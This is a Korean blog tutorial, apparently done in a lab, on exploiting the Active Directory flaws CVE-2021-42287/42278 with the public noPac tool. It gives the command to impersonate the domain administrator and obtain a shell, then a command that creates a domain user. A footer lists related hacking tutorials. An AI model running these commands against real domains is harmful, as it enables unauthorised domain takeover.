Active Directory 도메인 서비스 권한 상승 취약점
공격자가 일반 사용자의 권한을 도메인 관리자로 상승시켜 Active Directory 및 도메인을 제어하고, 사용자를 삭제 또는 생성하고, 원하는 모든 작업을 수행할 수 있도록 하는 심각한 Windows 취약점
KB5008380—인증 업데이트(CVE-2021-42287)
요약 CVE-2021-42287은 PAC(Kerberos Privilege Attribute Certificate)에 영향을 주는 보안 우회 취약성을 해결하고 잠재적 공격자가 도메인 컨트롤러를 가장할 수 있습니다. 이 취약성을 악용하려면 손상된 도
support.microsoft.com

CVE-2021-42287 : Active Directory Domain Services Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-42278
Active Directory Domain Services Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-42278, CVE-2021-42282, CVE-2021-42291. Publish Date : 2021-11-10 Last Update Date : 2021-11-13 - CVSS Scores & Vulnerability Types CVSS Score 6.5 Conf
www.cvedetails.com
AD 구성후 사용자 test 계정을 하나 만들겠습니다.


GitHub - Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user - GitHub - Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domai...
github.com

#python3 noPac.py DOMAIN/USERNAME:'PASSWORD' -dc-ip "AD서버 IP" -shell --impersonate administrato -use-ldap

쉽게 AD서버로 접근이 가능합니다.

noPac를 사용하면 취약점에 좀 더 쉽게 접근하실 수 있습니다.
net user /add fake abc@123456 /domain
이름 fake 비밀번호
명령어를 입력 시 오른쪽 사진처럼 사용자가 생성이 됩니다.


'보안 > KaliLinux' 카테고리의 다른 글
칼리 리눅스 cve-2021-40444 MS취약점 (3) | 2022.02.25 |
---|---|
칼리 리눅스 log4j-scan http, https (2) | 2022.02.25 |
칼리 리눅스 윈도우 10 백도어 바인딩, 프로그램 겹치기 (2) | 2022.02.23 |
칼리 리눅스 Seeker, ngrok 활용 안드로이드 및 아이폰 위치 추적 (16) | 2022.02.23 |
칼리 리눅스 메타스플로잇 활용 안드로이드 9 해킹 (3) | 2022.02.23 |